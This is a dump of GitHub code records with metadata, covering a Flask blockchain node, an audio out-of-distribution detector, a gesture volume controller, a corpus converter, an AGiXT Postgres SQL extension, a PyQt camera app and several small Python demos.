"line_number": 17, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 18, "usage_type": "call"}]}
+{"seq_id": "29253380165", "text": "import os\nimport random\nimport requests\n\nfrom flask import Flask, jsonify, request\n\nfrom backend.blockchain.blockchain import Blockchain\nfrom backend.pubsub import PubSub\nfrom backend.wallet.wallet import Wallet\nfrom backend.wallet.transaction import Transaction\nfrom backend.wallet.transaction_pool import TransactionPool\n\napp = Flask(__name__)\n\nblockchain = Blockchain()\nwallet = Wallet(blockchain)\ntransaction_pool = TransactionPool()\npubsub = PubSub(blockchain, transaction_pool)\n\n\n@app.route(\"/\")\ndef route_default():\n return \"Welcom to the Blockchain\"\n\n\n@app.route(\"/blockchain/\")\ndef route_blockchain():\n return jsonify(blockchain.to_json())\n\n\n@app.route(\"/blockchain/mine/\")\ndef route_blockchain_mine():\n blockchain.add_block(transaction_pool.transaction_data())\n block = blockchain.chain[-1]\n\n pubsub.brodcast_block(block)\n\n transaction_pool.clear_blockchain_transactions(blockchain)\n\n return jsonify(block.to_json())\n\n\n@app.route(\"/wallet/transact/\", methods=['POST'])\ndef route_wallet_transact():\n transaction_data = request.get_json()\n transaction = transaction_pool.existing_transaction(wallet.address)\n if transaction:\n transaction.update(\n wallet,\n transaction_data['recipient'],\n transaction_data['amount'],\n )\n else:\n transaction = Transaction(\n wallet,\n transaction_data['recipient'],\n transaction_data['amount'],\n )\n\n # print(f'transaction.to_json(): {transaction.to_json()}')\n pubsub.brodcast_transaction(transaction)\n\n return jsonify(transaction.to_json())\n\n\n@app.route(\"/wallet/info/\")\ndef route_wallet_info():\n return jsonify(\n {'address': wallet.address, 'balance': wallet.balance}\n )\n\n\nROOT_PORT = 8000\nPORT = ROOT_PORT\n\nif os.environ.get(\"PEER\") == \"True\":\n\n PORT = random.randint(5000, 7000)\n result = requests.get(f\"http://localhost:{ROOT_PORT}/blockchain/\")\n print(f\"Result in json: {result.json()}\")\n\n result_blockchain = Blockchain.from_json(result.json())\n try:\n blockchain.replace_chain(result_blockchain.chain)\n print(\"-- Successfully syncronized the local chain\")\n except Exception as e:\n print(f\"\\n -- Error syncronizing: {e}\")\n\napp.run(port=PORT, debug=False)\n", "repo_name": "amitgit712/python-blockchain", "sub_path": "backend/app/__init__.py", "file_name": "__init__.py", "file_ext": "py", "file_size_in_byte": 2286, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "flask.Flask", "line_number": 13, "usage_type": "call"}, {"api_name": "backend.blockchain.blockchain.Blockchain", "line_number": 15, "usage_type": "call"}, {"api_name": "backend.wallet.wallet.Wallet", "line_number": 16, "usage_type": "call"}, {"api_name": "backend.wallet.transaction_pool.TransactionPool", "line_number": 17, "usage_type": "call"}, {"api_name": "backend.pubsub.PubSub", "line_number": 18, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 28, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 40, "usage_type": "call"}, {"api_name": "flask.request.get_json", "line_number": 45, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 45, "usage_type": "name"}, {"api_name": "backend.wallet.transaction.Transaction", "line_number": 54, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 63, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 68, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 76, 
"usage_type": "call"}, {"api_name": "os.environ", "line_number": 76, "usage_type": "attribute"}, {"api_name": "random.randint", "line_number": 78, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 79, "usage_type": "call"}, {"api_name": "backend.blockchain.blockchain.Blockchain.from_json", "line_number": 82, "usage_type": "call"}, {"api_name": "backend.blockchain.blockchain.Blockchain", "line_number": 82, "usage_type": "name"}]}
+{"seq_id": "22935573536", "text": "#!/usr/bin/env python\n#\n# Author: Daniela Duricekova \n#\n\nimport multiprocessing\n\n\nNUMS = list(range(25, 33))\n\n\ndef fib(n):\n if n <= 1:\n return 1\n else:\n return fib(n - 1) + fib(n - 2)\n\n\ndef n_fib(n, results):\n results.put((n, fib(n)))\n\n\nif __name__ == '__main__':\n results = multiprocessing.Queue()\n processes = []\n for n in NUMS:\n p = multiprocessing.Process(target=n_fib, args=(n, results))\n processes.append(p)\n p.start()\n\n for p in processes:\n p.join()\n\n for _ in range(len(NUMS)):\n print(results.get())\n", "repo_name": "sopticek/blog", "sub_path": "2017-05-13-concurrent-and-parallel-programming-in-python-part-1/multiprocessing_no_inheritance.py", "file_name": "multiprocessing_no_inheritance.py", "file_ext": "py", "file_size_in_byte": 613, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 7, "dataset": "github-code", "pt": "53", "api": [{"api_name": "multiprocessing.Queue", "line_number": 24, "usage_type": "call"}, {"api_name": "multiprocessing.Process", "line_number": 27, "usage_type": "call"}]}
+{"seq_id": "10089626488", "text": "import os\r\nos.environ[\"TF_CPP_MIN_LOG_LEVEL\"] = \"3\"\r\nos.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\r\nimport argparse\r\nimport numpy as np\r\n# See installation guide for FAISS here: https://github.com/facebookresearch/faiss/blob/main/INSTALL.md\r\nimport faiss\r\nimport metrics\r\n\r\nparser = argparse.ArgumentParser(description=\"OOD Detection for Audio\")\r\n\r\nparser.add_argument(\"--ind_dataset\", \r\n default=\"mswc_en\", type=str,\r\n help=\"in-distribution dataset name\")\r\n\r\nparser.add_argument(\"--ood_dataset\", \r\n default=\"vocalsound\", type=str,\r\n help=\"out-of-distribution dataset name\")\r\n\r\nparser.add_argument(\"--models_dir\", \r\n default=\"./models/\", type=str,\r\n help=\"models directory path\")\r\n\r\nparser.add_argument(\"--features_dir\", \r\n default=\"./features/\", type=str, \r\n help=\"features directory path\")\r\n\r\nparser.add_argument(\"--k\", \r\n default=5, type=int, \r\n help=\"number of nearest neighbors for ood\")\r\n\r\nargs = parser.parse_args()\r\n\r\ndef run_deep_knn_ood(args):\r\n features_path = os.path.join(args.features_dir,\r\n f\"{args.ind_dataset}_yamnet\")\r\n \r\n tr_ind_feat = np.load(os.path.join(features_path, \r\n \"ind_train_features.npy\"))\r\n ts_ind_feat = np.load(os.path.join(features_path, \r\n \"ind_test_features.npy\"))\r\n ts_ood_feat = np.load(os.path.join(features_path, \r\n f\"{args.ood_dataset}_ood_test_features.npy\")) \r\n\r\n normalizer = lambda x: x / (np.linalg.norm(x, \r\n ord=2, axis=-1, keepdims=True) + 1e-10)\r\n tr_ind_feat = normalizer(tr_ind_feat) \r\n ts_ind_feat = normalizer(ts_ind_feat)\r\n ts_ood_feat = normalizer(ts_ood_feat)\r\n\r\n index = faiss.IndexFlatL2(tr_ind_feat.shape[1])\r\n index.add(tr_ind_feat)\r\n ind_D, _ = index.search(ts_ind_feat, args.k)\r\n ind_scores = -ind_D[:,-1]\r\n ood_D, _ = index.search(ts_ood_feat, args.k)\r\n ood_scores = -ood_D[:,-1]\r\n\r\n results = metrics.get_measures(\r\n ind_scores, ood_scores, \r\n recall_level = 0.95)\r\n fpr95 = results[\"FPR\"]\r\n auroc = results[\"AUROC\"]\r\n print(f\"FPR95: {fpr95} | AUROC: {auroc}\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n run_deep_knn_ood(args)", "repo_name": "Zaharah/ood_audio", "sub_path": "run_ood.py", "file_name": "run_ood.py", "file_ext": "py", "file_size_in_byte": 2123, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.environ", "line_number": 2, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 3, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 10, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path", "line_number": 35, "usage_type": "attribute"}, {"api_name": "numpy.load", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path", "line_number": 38, "usage_type": "attribute"}, {"api_name": "numpy.load", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path", "line_number": 40, "usage_type": "attribute"}, {"api_name": "numpy.load", "line_number": 42, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 42, "usage_type": "call"}, {"api_name": "os.path", "line_number": 42, "usage_type": "attribute"}, {"api_name": "numpy.linalg.norm", "line_number": 45, "usage_type": "call"}, {"api_name": 
"numpy.linalg", "line_number": 45, "usage_type": "attribute"}, {"api_name": "faiss.IndexFlatL2", "line_number": 51, "usage_type": "call"}, {"api_name": "metrics.get_measures", "line_number": 58, "usage_type": "call"}]}
+{"seq_id": "71664090729", "text": "import cv2\nimport mediapipe as mp\nimport time\nimport numpy as np\nimport hand_tracker as ht\n\n\nfrom ctypes import cast, POINTER\nfrom comtypes import CLSCTX_ALL\nfrom pycaw.pycaw import AudioUtilities, IAudioEndpointVolume\ndevices = AudioUtilities.GetSpeakers()\ninterface = devices.Activate(\n IAudioEndpointVolume._iid_, CLSCTX_ALL, None)\nvolume = cast(interface, POINTER(IAudioEndpointVolume))\n\nvolume.GetVolumeRange()\nvolRnge = volume.GetVolumeRange()\nmaxvol =volRnge[1]\nminvol = volRnge[0]\n\ncap = cv2.VideoCapture(0)\nprint(minvol)\nptime = 0\nvolbar = -65.25\ndetector = ht.hand_detector(detection_confidence=0.75)\nwhile True:\n success, img = cap.read()\n img = cv2.flip(img,1)\n ctime = time.time()\n fps = 1/(ctime - ptime)\n ptime = ctime\n cv2.putText(img,f\"FPS : {int(fps)}\",(10,80),cv2.FONT_HERSHEY_COMPLEX,1,(0,0,0),2)\n detector.hand_detection(img)\n lmlis = detector.findposition(img,draw = False)\n if len(lmlis) != 0:\n\n x , y = lmlis[4][1] , lmlis[4][2]\n x1 , y1 = lmlis[8][1], lmlis[8][2]\n cx, cy = (x+x1)//2,(y+y1)//2\n length = np.hypot(x1 - x,y1-y)\n vol = np.interp(length,[30,110],[minvol,maxvol])\n volbar = np.interp(vol,[minvol,maxvol],[400,150])\n volper = np.interp(vol,[minvol,maxvol],[0,100])\n volume.SetMasterVolumeLevel(vol, None)\n\n cv2.circle(img,(x , y),8,(0,255,0),-1)\n cv2.circle(img,(x1 , y1),8,(0,255,0),-1)\n cv2.circle(img,(cx , cy),8,(0,255,0),-1)\n \n cv2.line(img,(x,y),(x1,y1),(0,255,0),2)\n cv2.rectangle(img,(150,150),(85,400),(0,125,0))\n cv2.rectangle(img,(150,int(volbar)),(85,400),(0,125,0),-1)\n cv2.putText(img,f\"{int(volper)}%\",(30,150),cv2.FONT_HERSHEY_COMPLEX,0.5,(0,0,255),1)\n\n if length < 35:\n cv2.circle(img,(cx , cy),8,(0,0,255),-1)\n\n \n\n\n\n\n\n\n\n\n cv2.imshow(\"Image\",img)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n \n\n ", "repo_name": "Joelthomas62384/ai-computer-vision", "sub_path": "gesture_volume.py", "file_name": "gesture_volume.py", "file_ext": "py", "file_size_in_byte": 1937, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pycaw.pycaw.AudioUtilities.GetSpeakers", "line_number": 11, "usage_type": "call"}, {"api_name": "pycaw.pycaw.AudioUtilities", "line_number": 11, "usage_type": "name"}, {"api_name": "comtypes.CLSCTX_ALL", "line_number": 13, "usage_type": "argument"}, {"api_name": "pycaw.pycaw.IAudioEndpointVolume._iid_", "line_number": 13, "usage_type": "attribute"}, {"api_name": "pycaw.pycaw.IAudioEndpointVolume", "line_number": 13, "usage_type": "name"}, {"api_name": "ctypes.cast", "line_number": 14, "usage_type": "call"}, {"api_name": "ctypes.POINTER", "line_number": 14, "usage_type": "call"}, {"api_name": "pycaw.pycaw.IAudioEndpointVolume", "line_number": 14, "usage_type": "argument"}, {"api_name": "cv2.VideoCapture", "line_number": 21, "usage_type": "call"}, {"api_name": "hand_tracker.hand_detector", "line_number": 25, "usage_type": "call"}, {"api_name": "cv2.flip", "line_number": 28, "usage_type": "call"}, {"api_name": "time.time", "line_number": 29, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 32, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_COMPLEX", "line_number": 32, "usage_type": "attribute"}, {"api_name": "numpy.hypot", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.interp", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.interp", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.interp", "line_number": 
43, "usage_type": "call"}, {"api_name": "cv2.circle", "line_number": 46, "usage_type": "call"}, {"api_name": "cv2.circle", "line_number": 47, "usage_type": "call"}, {"api_name": "cv2.circle", "line_number": 48, "usage_type": "call"}, {"api_name": "cv2.line", "line_number": 50, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 51, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 52, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 53, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_COMPLEX", "line_number": 53, "usage_type": "attribute"}, {"api_name": "cv2.circle", "line_number": 56, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 67, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 68, "usage_type": "call"}]}
+{"seq_id": "41521044463", "text": "import requests\nimport sys\ndef test(url_test):\n payload={'page':'1','count':'2'}\n urltest=url_test\n req=requests.post(urltest,data=payload, verify=False)\n print(req.url)\n print(type(req.text))\n\n print(type(req.json()))\n\n print(req.headers)\n\nurlname=sys.argv[1]\n\ntest(urlname)\n# test_url=\"https://api.github.com/repos/clairyin/homework/contents\"\n# win_url=\"J:/xew1.txt\"\n# with open(win_url, 'rb') as f:\n# print(f.readlines())\n# def get_git():\n#\n# req=requests.get(test_url)\n# #print(req.text)\n# print(req.json())\n#\n# file = open(win_url, 'rb')\n# files = {'file': file}\n# requests.post(test_url,)\n# get_git()", "repo_name": "clairyin/homework", "sub_path": "yaoxuechuan/homework01.py", "file_name": "homework01.py", "file_ext": "py", "file_size_in_byte": 658, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "requests.post", "line_number": 6, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 14, "usage_type": "attribute"}]}
+{"seq_id": "18754616760", "text": "#!/opt/python-2.7/bin/python2.7\n#\n# script can be run without invoking python because of shebang\n# will be run with correct version on Patas\n#\n# Code last updated on 5/26/2014 by Claire Jaja\n#\n# This script will convert documents from the AQUAINT2 format\n# to the AQUAINT format.\n\nimport sys\nfrom bs4 import BeautifulSoup\nfrom os import listdir, path, makedirs\n\ndef main():\n # argument is folder to put converted corpus\n converted_data = sys.argv[1]\n AQUAINT2 = \"/corpora/LDC/LDC08T25/data/\"\n\n # for every folder in AQUAINT2/data\n for folder in listdir(AQUAINT2):\n sys.stderr.write(\"Folder: \"+folder+\"\\n\")\n # create same folder in converted_data folder\n new_folder = path.join(converted_data,folder)\n if not path.exists(new_folder):\n makedirs(new_folder)\n # for every .xml file in that folder\n for file in [ x for x in listdir(path.join(AQUAINT2,folder)) if x.endswith(\".xml\") ]:\n sys.stderr.write(\"File: \"+file+\"\\n\")\n # create file with same name in newly created folder\n new_file = open(path.join(new_folder,file),'w')\n # parse xml with beautiful soup\n xml = open(path.join(AQUAINT2,folder,file),'r')\n soup = BeautifulSoup(xml)\n # gather doc ID, headline, and text\n docs = soup.find_all(\"doc\")\n doc_ids = []\n headlines = []\n text = []\n for doc in docs:\n doc_ids.append(doc['id'])\n if doc.headline:\n headlines.append(doc.headline.get_text())\n else:\n headlines.append(\"None\")\n text.append(doc.text)\n xml.close()\n # print out doc ID, headline, and text to newly created file\n for i in range(len(doc_ids)):\n new_file.write(\"\\n\")\n new_file.write(\" %s \\n\" % doc_ids[i])\n new_file.write(\"\\n\")\n if headlines[i]:\n new_file.write(\" %s \\n\" % headlines[i].encode('utf8'))\n new_file.write(\" %s \\n\" % text[i].encode('utf8'))\n new_file.write(\"\\n\")\n new_file.write(\" \\n\")\n new_file.close()\n\n\nif __name__ == '__main__':\n\tmain()\n", "repo_name": "amkahn/question-answering", "sub_path": "src/convert_AQUAINT2_to_AQUAINT_format.py", "file_name": "convert_AQUAINT2_to_AQUAINT_format.py", "file_ext": "py", "file_size_in_byte": 2351, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sys.argv", "line_number": 17, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 21, "usage_type": "call"}, {"api_name": "sys.stderr.write", "line_number": 22, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 22, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path", "line_number": 24, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path", "line_number": 25, "usage_type": "name"}, {"api_name": "os.makedirs", "line_number": 26, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path", "line_number": 28, "usage_type": "name"}, {"api_name": "sys.stderr.write", "line_number": 29, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 29, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path", "line_number": 31, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path", "line_number": 33, "usage_type": "name"}, {"api_name": 
"bs4.BeautifulSoup", "line_number": 34, "usage_type": "call"}]}
+{"seq_id": "2810922203", "text": "import logging\n\ntry:\n import psycopg2\nexcept ImportError:\n import sys\n import subprocess\n\n subprocess.check_call([sys.executable, \"-m\", \"pip\", \"install\", \"psycopg2\"])\n import psycopg2\n\nimport psycopg2.extras\nimport logging\nfrom Extensions import Extensions\n\n\nclass postgres_database(Extensions):\n def __init__(\n self,\n POSTGRES_DATABASE_NAME: str = \"\",\n POSTGRES_DATABASE_HOST: str = \"\",\n POSTGRES_DATABASE_PORT: int = 5432,\n POSTGRES_DATABASE_USERNAME: str = \"\",\n POSTGRES_DATABASE_PASSWORD: str = \"\",\n **kwargs,\n ):\n self.agent_name = kwargs[\"agent_name\"] if \"agent_name\" in kwargs else \"gpt4free\"\n self.ApiClient = kwargs[\"ApiClient\"] if \"ApiClient\" in kwargs else None\n self.POSTGRES_DATABASE_NAME = POSTGRES_DATABASE_NAME\n self.POSTGRES_DATABASE_HOST = POSTGRES_DATABASE_HOST\n self.POSTGRES_DATABASE_PORT = POSTGRES_DATABASE_PORT\n self.POSTGRES_DATABASE_USERNAME = POSTGRES_DATABASE_USERNAME\n self.POSTGRES_DATABASE_PASSWORD = POSTGRES_DATABASE_PASSWORD\n self.commands = {\n \"Custom SQL Query in Postgres Database\": self.execute_sql,\n \"Get Database Schema from Postgres Database\": self.get_schema,\n }\n\n def get_connection(self):\n try:\n connection = psycopg2.connect(\n database=self.POSTGRES_DATABASE_NAME,\n host=self.POSTGRES_DATABASE_HOST,\n port=self.POSTGRES_DATABASE_PORT,\n user=self.POSTGRES_DATABASE_USERNAME,\n password=self.POSTGRES_DATABASE_PASSWORD,\n )\n return connection\n except Exception as e:\n logging.error(f\"Error connecting to Postgres Database. Error: {str(e)}\")\n return None\n\n async def execute_sql(self, query: str):\n if \"```sql\" in query:\n query = query.split(\"```sql\")[1].split(\"```\")[0]\n query = query.replace(\"\\n\", \" \")\n query = query.strip()\n logging.info(f\"Executing SQL Query: {query}\")\n connection = self.get_connection()\n cursor = connection.cursor(cursor_factory=psycopg2.extras.DictCursor)\n try:\n cursor.execute(query)\n rows = cursor.fetchall()\n cursor.close()\n connection.close()\n rows_string = \"\"\n # If there is only 1 row and 1 column, return the value as a string\n if len(rows) == 1 and len(rows[0]) == 1:\n return str(rows[0][0])\n # If there is more than 1 column and at least 1 row, return it as a CSV format\n if len(rows) >= 1 and len(rows[0]) > 1:\n # If there is more than 1 column and at least 1 row, return it as a CSV format, build column heading, and make sure each row value is quoted\n column_headings = []\n for column in cursor.description:\n column_headings.append(column.name)\n rows_string += \",\".join(column_headings) + \"\\n\"\n for row in rows:\n row_string = []\n for value in row:\n row_string.append(f'\"{value}\"')\n rows_string += \",\".join(row_string) + \"\\n\"\n return rows_string\n # If there is only 1 column and more than 1 row, return it as a CSV format\n if len(rows) > 1 and len(rows[0]) == 1:\n for row in rows:\n rows_string += f'\"{row[0]}\"\\n'\n return rows_string\n return rows_string\n except Exception as e:\n logging.error(f\"Error executing SQL Query: {str(e)}\")\n # Reformat the query if it is invalid.\n new_query = self.ApiClient.prompt_agent(\n agent_name=self.agent_name,\n prompt_name=\"Validate PostgreSQL\",\n prompt_args={\n \"database_type\": \"PostgreSQL\",\n \"schema\": await self.get_schema(),\n \"query\": query,\n },\n )\n return await self.execute_sql(query=new_query)\n\n async def get_schema(self):\n logging.info(f\"Getting schema for database '{self.POSTGRES_DATABASE_NAME}'\")\n connection = 
self.get_connection()\n cursor = connection.cursor(cursor_factory=psycopg2.extras.DictCursor)\n cursor.execute(\n f\"SELECT schema_name FROM information_schema.schemata WHERE schema_name NOT IN ('pg_catalog', 'information_schema');\"\n )\n schemas = cursor.fetchall()\n sql_export = []\n key_relations = []\n for schema in schemas:\n schema_name = schema[\"schema_name\"]\n cursor.execute(\n f\"\"\"\n SELECT kcu.table_name as foreign_table, rel_tco.table_name as primary_table,\n kcu.column_name as foreign_column, rel_kcu.column_name as primary_column\n FROM information_schema.table_constraints tco\n JOIN information_schema.key_column_usage kcu \n ON kcu.constraint_name = tco.constraint_name\n AND kcu.constraint_schema = tco.constraint_schema\n JOIN information_schema.referential_constraints rco ON tco.constraint_name = rco.constraint_name\n AND tco.constraint_schema = rco.constraint_schema\n JOIN information_schema.key_column_usage rel_kcu ON rco.unique_constraint_name = rel_kcu.constraint_name\n AND rco.unique_constraint_schema = rel_kcu.constraint_schema\n JOIN information_schema.table_constraints rel_tco ON rel_kcu.constraint_name = rel_tco.constraint_name\n AND rel_kcu.constraint_schema = rel_tco.constraint_schema\n WHERE tco.constraint_type = 'FOREIGN KEY' AND tco.table_schema = '{schema_name}' \n \"\"\"\n )\n relations = cursor.fetchall()\n if relations:\n for relation in relations:\n key_relations.append(\n f\"-- {relation['foreign_table']}.{relation['foreign_column']} can be joined with \"\n f\"{relation['primary_table']}.{relation['primary_column']}\"\n )\n\n cursor.execute(\n f\"\"\"\n SELECT table_name, column_name, data_type, column_default, is_nullable, ordinal_position \n FROM information_schema.columns \n WHERE table_schema = '{schema_name}';\n \"\"\"\n )\n rows = cursor.fetchall()\n\n table_columns = {}\n for row in rows:\n table_name = row[\"table_name\"]\n if table_name not in table_columns:\n table_columns[table_name] = []\n column_details = {\n \"column_name\": row[\"column_name\"],\n \"data_type\": row[\"data_type\"],\n \"column_default\": row[\"column_default\"],\n \"is_nullable\": row[\"is_nullable\"],\n }\n table_columns[table_name].append(column_details)\n\n for table_name, columns in table_columns.items():\n create_table_sql = f\"CREATE TABLE {schema_name}.{table_name} (\"\n for column in columns:\n column_sql = f\"{column['column_name']} {column['data_type']}\"\n if column[\"column_default\"]:\n column_sql += f\" DEFAULT {column['column_default']}\"\n if column[\"is_nullable\"] == \"NO\":\n column_sql += \" NOT NULL\"\n create_table_sql += f\"{column_sql}, \"\n create_table_sql = create_table_sql.rstrip(\", \") + \");\"\n sql_export.append(create_table_sql)\n connection.close()\n return \"\\n\\n\".join(sql_export + key_relations)\n", "repo_name": "Josh-XT/AGiXT", "sub_path": "agixt/extensions/postgres_database.py", "file_name": "postgres_database.py", "file_ext": "py", "file_size_in_byte": 8038, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2174, "dataset": "github-code", "pt": "53", "api": [{"api_name": "subprocess.check_call", "line_number": 9, "usage_type": "call"}, {"api_name": "sys.executable", "line_number": 9, "usage_type": "attribute"}, {"api_name": "Extensions.Extensions", "line_number": 17, "usage_type": "name"}, {"api_name": "psycopg2.connect", "line_number": 41, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 50, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 58, "usage_type": "call"}, 
{"api_name": "psycopg2.extras", "line_number": 60, "usage_type": "attribute"}, {"api_name": "logging.error", "line_number": 90, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 104, "usage_type": "call"}, {"api_name": "psycopg2.extras", "line_number": 106, "usage_type": "attribute"}]}
+{"seq_id": "3673933445", "text": "from typing import NamedTuple\n\nclass MyTuple(NamedTuple):\n id: int\n name: str\n\nt1 = MyTuple(1, \"A\")\nt2 = MyTuple(*(2, \"B\"))\nt3 = MyTuple(**{\n \"id\": 3,\n \"name\": \"C\"})\nt4 = MyTuple._make([4, \"D\"])\n\nprint(t1)\nprint(t2)\nprint(t3)\nprint(t4)", "repo_name": "robobe/robobe.github.io", "sub_path": "examples/python/ds/named_tuple/hello.py", "file_name": "hello.py", "file_ext": "py", "file_size_in_byte": 247, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "typing.NamedTuple", "line_number": 3, "usage_type": "name"}]}
+{"seq_id": "3930685816", "text": "import nltk\n\n#importing stop words library (or not library !)\n\nnltk.download('stopwords')\n\nfrom nltk.corpus import stopwords\n\nfrom nltk import word_tokenize\n\n#langues reconnues par python stopwords\n\nlanguage = ['turkish', 'tajik', 'swedish', 'spanish', 'slovene', 'russian', 'romanian', 'portuguese', 'norwegian', 'nepali', 'kazakh', 'italian', 'indonesian', 'hungarian', 'greek', 'german', 'french', 'finnish', 'english', 'dutch', 'danish', 'azerbaijani', 'arabic']\npotentiel = []\nreconnu = []\ndico = {}\ndef reclangue() :\n text = str(input('type here '))\n tokenizedtxt = word_tokenize(text)\n for lang in language : \n stpwrs = (stopwords.words(lang))\n for word in tokenizedtxt : \n if word in stpwrs : \n potentiel.append(lang)\n for lng in potentiel : \n if lng not in reconnu :\n reconnu.append(lng)\n \n for lng in reconnu : \n cal = potentiel.count(lng)\n dico[lng] = cal\n dict(sorted(dico.items(), key=lambda item: item[1]))\n \n return print(max(dico, key=dico.get)) \n\nreclangue()\n", "repo_name": "MohdSarar/Language-Recognition-NLTK", "sub_path": "lang_reco.py", "file_name": "lang_reco.py", "file_ext": "py", "file_size_in_byte": 1083, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "nltk.download", "line_number": 5, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 19, "usage_type": "call"}, {"api_name": "nltk.corpus.stopwords.words", "line_number": 21, "usage_type": "call"}, {"api_name": "nltk.corpus.stopwords", "line_number": 21, "usage_type": "name"}]}
+{"seq_id": "1167423623", "text": "\"\"\"\nMy Camera Application\nouthor : Sa'ad\n\n\"\"\"\n\nimport sys\n\nimport cv2\nfrom PyQt5.QtCore import QTimer\nfrom PyQt5.QtGui import QIcon, QImage, QPixmap\nfrom PyQt5.QtWidgets import *\n\n\nclass Window(QWidget) :\n # My Camera Application\n\n def __init__(self) :\n super().__init__() \n\n # variables for app window\n self.window_width = 640\n self.window_height = 400\n\n # image variables\n self.img_width = 640\n self.img_height = 400\n\n # setup the window\n self.setWindowTitle(\"My Camera App\")\n self.setGeometry(100, 100, self.window_width, self.window_height)\n self.setFixedSize(self.window_width, self.window_height)\n\n self.camera_icon = QIcon(cap_icon_path)\n\n # setup timer\n self.timer = QTimer()\n self.timer.timeout.connect(self.update)\n\n self.ui()\n\n def ui(self) :\n # contains all UI things\n # layout\n grid = QGridLayout()\n self.setLayout(grid)\n\n # image label\n self.image_label = QLabel(self)\n self.image_label.setGeometry(0, 0, self.img_width, self.img_height)\n\n # capture btn\n self.capture_btn = QPushButton(self)\n self.capture_btn.setIcon(self.camera_icon)\n self.capture_btn.setStyleSheet(\"border-radius: 30; border : 2px solid black; border-width : 3px\")\n self.capture_btn.setFixedSize(50, 50)\n self.capture_btn.clicked.connect(self.save_image)\n\n if not self.timer.isActive() :\n self.cap = cv2.VideoCapture(0)\n self.timer.start(20)\n\n grid.addWidget(self.capture_btn, 0, 0)\n grid.addWidget(self.image_label, 0 , 1)\n \n self.show()\n\n def update(self) :\n # update frames\n _, self.frame = self.cap.read()\n frame = cv2.cvtColor(self.frame, cv2.COLOR_BGR2RGB)\n height, width, channel = frame.shape\n step = channel * width\n\n q_frame = QImage(frame.data, width, height, step, QImage.Format_RGB888)\n self.image_label.setPixmap(QPixmap.fromImage(q_frame))\n\n def save_image(self) :\n # save image from camera\n print(\"saving image\")\n cv2.imwrite(\"my_img.jpg\", self.frame)\n\n def record(self) :\n # record video\n pass\n\n\ncap_icon_path = \"assets/icons/capture.png\"\n\n# run \napp = QApplication(sys.argv)\nwin = Window()\nsys.exit(app.exec_())\n", "repo_name": "Saad-001/learning-python-with-problem-solving", "sub_path": "week_3/module_10_lab_class_3/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 2376, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "PyQt5.QtGui.QIcon", "line_number": 34, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QTimer", "line_number": 37, "usage_type": "call"}, {"api_name": "cv2.VideoCapture", "line_number": 60, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 71, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", 